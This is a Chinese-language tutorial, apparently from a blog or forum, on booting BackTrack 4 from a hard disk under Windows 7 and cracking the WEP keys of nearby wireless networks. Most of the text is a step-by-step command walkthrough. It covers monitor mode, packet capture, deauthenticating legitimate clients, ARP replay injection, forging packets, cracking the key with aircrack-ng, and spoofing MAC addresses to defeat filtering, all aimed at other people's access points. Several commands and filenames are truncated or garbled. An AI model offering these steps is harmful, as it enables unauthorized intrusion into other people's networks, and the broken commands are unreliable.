2024年1月21日发(作者:)

Win7下硬盘启动BT4正式版破解wep无线密码

相关搜索: Win, wep, 密码, 硬盘, 无线

今天看了N多教程,N多帖子,终于成功了,汗,光BT4的硬盘安装方法就换了N种。

首先下载BT4,我下的是正式版。

=============================================================

然后,下载grub4dos,解压其中的grldr、、,放C盘根目录下;(我已经打包: 释放在C盘根目录)

创建windows7下Grub启动条目:

在运行里面输入cmd,然后输入下面命令

bcdedit /create /d "Grub" /application bootsector

这里我看教程的时候忽略过,输完上面的命令,会有回显{里面都是数字}就是下文中的{id}记得把你自己的数字替换进去

接着用下面的指令来设置引导参数,{id}替换为上面回显的ID--★★(项

{da38130a-3ec1-11df-a9e8-f13717fbf3bd} 成功创建。)

bcdedit /set {id} device boot

bcdedit /set {id} path

bcdedit /displayorder {id} /addlast

bcdedit /displayorder {da38130a-3ec1-11df-a9e8-f13717fbf3bd} /dellast

设置等待时间

bcdedit /timeout 5

=============================================================

我打包的文件中是需要你修改一下的按照你释放镜像的路径,BT4一定要释放在根目录,我是释放在D盘

按照下面的来改

color black/cyan yellow/cyan

timeout=5

default=0

title Windows 7

find --set-root /bootmgr

chainloader /bootmgr

boot

title BT4

find --set-root /boot/vmlinuz

kernel (hd0,5)/boot/vmlinuz BOOT=casper boot=casper nopersistent rw quiet vga=0x317

initrd (hd0,5)/boot/`

boot

需要改的是(hd0,5),(hd0,5)的计算是hd0为第一块主硬盘,在grub下逻辑分区从4开始,所以D盘即为4,E盘即为5。

=============================================================

这时候重启,会有Win7和Grub的选择,自然选择Grub

然后还有一次选择,选项是Win7和BT4,自然选择BT4

然后等很久是一个图形窗口

我的无线网卡是 5100agn 所以我需要一段命令,airmon-ng start wlan0 6 (由于5100网卡的特殊性,需要手动开启它的监听模式,这个设置是不会保存的下次要重输)

输入“startx”,键盘“Enter”执行,等待片刻,系统进入图形界面;

=============================================================

这个文件比较大,上传网盘了,点击下载

/file/

snoopwpe2和wap都在里面,我们只需要wpe就行了,释放到硬盘。(这个步骤提前在Windows下操作就行了)

=============================================================

点击屏幕左下角的“开始菜单”>“system mune”>“storeage media”>“点击窗口上的刷新按钮(这时会显示硬盘盘符)”>“进入所在的目录”>“把拖到桌面上”

“开始菜单”>“Run Command”;

输入“dpkg -i ”(这里的文件名我取的),键盘“Enter”执行,等待几秒钟,桌面上会出现一个叫“desktop”的文件夹,里面有spoonwep2和spoonwpa图标,直接单击图标就能运行spoonwep2或spoonwpa;; s. t3 g4 Q3 t. m) o# z j

=============================================================

安装方法:

解包后执行

dpkg -i

删除

apt-get remove allspoon

安装后点图标就能运行

下载 (91.5 KB)

2009-6-21 11:28

要运行命令的请输入以下命令执行:

spoonwep2 执行:

spoonwep2

spoonwpa 执行:

spoonwpa

接下来都是spoonwep2的操作了,网上有很多教程,就不多说了。

BT4 pre final配置网络(上网设置)

BT4正式版本.的网络模块默认是没有开启的..需要手动开启.

打开console

/etc/init.d/wicd start

update-rc.d wicd defaults

如果启动成功了.配置IP的位置如下:

开始菜单-=>internet-=>wicd network manager

=======================

hciconfig用于配置蓝牙设备。

.

hciX的名字是蓝牙设备中安装该系统。

如果hciX没有得到, hciconfig打印的名称和基本资料,所有的蓝牙设备中安装该系统。

如果hciX ,但没有给出命令是,它的基本信息打印设备hciX,基本信息接口类型,屋宇署处理的ACL的MTU ,上海合作组织的MTU ,旗帜(最多,初始化,运行,原材料,页面

扫描功能,扫描功能的调查,查询,验证功能,加密功能) 。

基本用法

hciconfig

hciconfig hci0行动

hcitool扫描

rfcomm连接0 00:11:22:33:44:55

注意:如果您有自己的蓝牙鼠标/键盘接口Device交换模式使用hcitool。

1、ifconfig -a

获得无限网卡的Mac地址,如果没看到有无线网卡,可以使用iwconfig命令,查看是否有加载

=================================================

2、airmon-ng start rausb0 6

这个命令用于将自己的无线网卡置于监控模式,即类似一个AP的效果,因此可以有抓别人包的功能。

其中 rausb0 是无线网卡名字的 ,在第一个ifconfig -a命令可以看得到。rausb0 后面的那个6是需要破解的AP的频道

=================================================

3、airodump-ng --ivs -w pack -c 6 rausb0

这个命令会列出所有该频道的AP。同时是截取数据包的命令,在当前目录,生成的包文件供第八步使用。

其中,6 是指你需要监控的频道,必须和第二个命令里的一样,rausb0是刚才第二步出现的网卡名字。

这个命令运行以后,显示的内容比较多,简单介绍一下:

BSSID :是AP的Mac 地址

PWR: AP信号的大小,如果低于10,丢包情况严重,比较难破解

RXQ: 干扰的大小

Beacons:发送接受的包,参考信息,在跳说明有数据

#Data: 这个比较重要,是接受到可以用来破解的特殊包,如果一直不变,那么,说明没有客户端连接,破解可能很麻烦,如果对方有大文件在下载,那么这个跳的速度非常快,几分钟就可以有足够的包来破解了,如果跳得很慢,那么,就需要用注入的方式来获取包了。

CH:频道

MB:网络连接速度 54就是54MB

ENC, CIPHER,AUTH

这些是加密方式,我们这次只讨论显示为 WEP

如果显示 WPA TKIP 啥的,只能密码穷举破解,个人认为希望不大。

ESSID: 这个是AP的名字,需要用到的。如果是中文的话可以下载一个中文包,下载地址

过一会儿,下面会显示哪些客户端连接到了哪些AP,针对有些Mac地址加密的,很容易模拟对方客户端的Mac从而骗进去,所以不要简单地相信Mac限制功能。

这个窗口就开着好了,不用关闭,以后的命令,需要重新打开一个终端窗口(shell)操作。

a、如果有客户端,并且合法用户端比较活跃,可以直接使用aircrack-ng进行破解。

aircrack-ng -n 64 -b pack_

b、如果合法客户之产生少量的ivs数据,就需要继续下面的注入攻击,加速破解。

c、如果合法客户端,但根本不通讯,就不能通过下面的方法进行下面的注入攻击产生arp包,就需要-0冲突模式强行断开客户端和ap的链接,使之重连,产生握手数据让-3获得足够有效的ARP从而完成ARP注入

aireplay-ng -3 -b -h <合法客户端mac> rausb0

aireplay-ng -0 10 -a -c <合法客户端mac> rausb0

注:

airodump-ng rausb0 会搜索所有的无线网络。

=================================================

4、aireplay-ng -1 0 -e ap_essid -a ap_mac -h pc_mac rausb0

注入测试(无客户端开发式WEP破解从这里开始)

这一步开始,我们要做一些真正的破解工作,主要是针对那些客户端仅仅连接,没什么流量的AP,这种AP,#Data的增长非常慢,往往需要很长的时间才有可能取得足够的包(一般5位的密码需要10000个包左右,更多的密码就要更多的。。。。)这个时候就需要 aireplay-ng

出面了,顾名思义,这个软件就是 Replay,也就是说,模拟发包。

首先解释命令:

-e ap_essid 就是 -e 之后加上你需要破解的ESSID,比如 TP-LINK , linksys,注意大小写。

-a ap_mac 就是 -a 之后加上你需要破解的AP的Mac地址,上面的图就可以看得到BSSID。

-h pc_mac 就是 -h 之后,加上你的无线网卡的 Mac地址, 在第一步你可以得到。

rausb0 ,上面解释过了。

举个例子:

aireplay-ng -1 0 -e Tp-link -a -h rausb0

这一条命令,是用欺骗的方式,连接上那个AP,因此,如果网络信号不好,可能会执行不成功。

如果成功了,那么会显示Successful :-] 字样。如下图。否则,让信号强度大于10

=================================================

5、aireplay-ng -5 -b ap_mac -h pc_mac rausb0

上一条成功以后,我们需要开始收集那些需要的数据包,才能够进行模拟,并且破解。

所谓的需要的数据包,就是 #Data的数据,如果 #Data一直是0,那么可能会很麻烦,最好的情况是 #Data缓慢增长的这种情况。

解释一下

-b ap_mac 就是你需要破解的AP的Mac 地址。

-h pc_mac 就是你自己网卡的Mac地址。

rausb0 就是你自己网卡名字同上面一样。

这一条命令的执行,和#data包有关,如果#Data 没有增加,则这个命令会一直执行,直到捕获一个#Data包。

捕获以后,程序会问你是否需要用这个包来模拟攻击。回答Y即可。

如果攻击成功,则会显示成功,失败往往是因为信号太差造成的, 如果攻击失败(往往是捕获的包有问题),程序重试N次以后,或自动重新开始捕捉包,继续进行即可。

等成功完成以后,会显示一个文件名:

这个文件名,XXXXX里面是数字,是一个文件。下一部会用得到。

这一步是最有可能失败的一步,尽量保持信号好一点。

=================================================

6、packetforge-ng -0 -a ap_mac -h pc_mac -k 255.255.255.255 -l 255.255.255.255 -y

-w mrarp

第六步,参数比较多,解释一下:

-a ap_mac 是待破解的AP的Mac地址,

-h pc_mac 是你自己的无线网卡Mac地址

就是上一步显示的那个文件名。

这一步会很快做完, 显示生成文件到 mrarp啥的,其实就是破解包的准备过程。如下图。

对了这里的-l是字母不是数字1。

=================================================

7、aireplay-ng -2 -r mrarp -x 256 rausb0

这一步没哈可以修改的,参数解释一下

rausb0 是 你的无线网卡的名字

256是攻击速度,1024是最大值,个人建议设为256 ,或128这样不容易死掉。

这一步执行后,你会看到第一个终端窗口(shell)里面,你破解的那个AP后面的 #Data在飞速增长,我们只需等待十几秒数据包就冲到5位数字以上了。如果第一个终端窗口(shell)里面的#Data没有在飞速增长的话那就是你操作时出了错误。

=================================================

8、我们可以新打开一个终端窗口,当 #Data达到 10000个的时候,就可以测试破解了,很多密码都可以 10000左右#Data就算出来

新窗口中运行:

aircrack-ng -n 64 -b ap_mac

解释一下,

64 AP使用的是64位加密,如果是128的话把64改成128

-b ap_mac 对方AP的Mac地址

其实是第三步自动生成的一个文件, 如果你多次运行了第三步,那么,可能会生成多个 文件, 你可以到对应的文件夹里看一下(就在桌面上的第一个文件夹图标里),找到XX最大的那个,就是你当前正在使用的这个文件。

运行以后,如果运气好,一般10000个#Data就可以破解出来密码,同时会显示 对应的Ascii码,如果不是标准Ascii码就是一串数字,记录下来,搞事实上。

运气不好的情况,程序继续等待更多的#Data,再重新计算一次密码

☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆

更新BT3中的rt73驱动

首先去下载kernel,大概60多M,然后放到CBT3base下

/

进入BT3

把最新驱动解压到root目录下

ig rausb0 down 禁用掉网卡

be -r rt73

2dir

rt73-k2wrlz-3.0.1/Module

install

ig rausb0 up 重新启用网卡

☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆

如果是intel3945网卡,需要更换可监听的驱动

modprobe -r iwl3945 卸载原有驱动

modprobe ipwraw 加载可监听的驱动

modinfo ipwraw 查看驱动情况

最新的 ipwraw的版本是2

macchanger -m 00:11:22:33:44:55 wifi0修改mac地址(非必须的)

其他步骤如同rt73网卡。

☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆

有合法客户端,并且数据量很大,可以使用另类快速破解

开始监听无线网卡

airmon-ng start rausb0 11

wesside-ng -i rausb0 -v 01:02:03:04:05:06(AP的mac地址)

Wesside-ng这个命令其实就是一个-5 碎片注入,fragmentation 构造注入包,-3arp注入,最后PTW 破解这

样一个思路。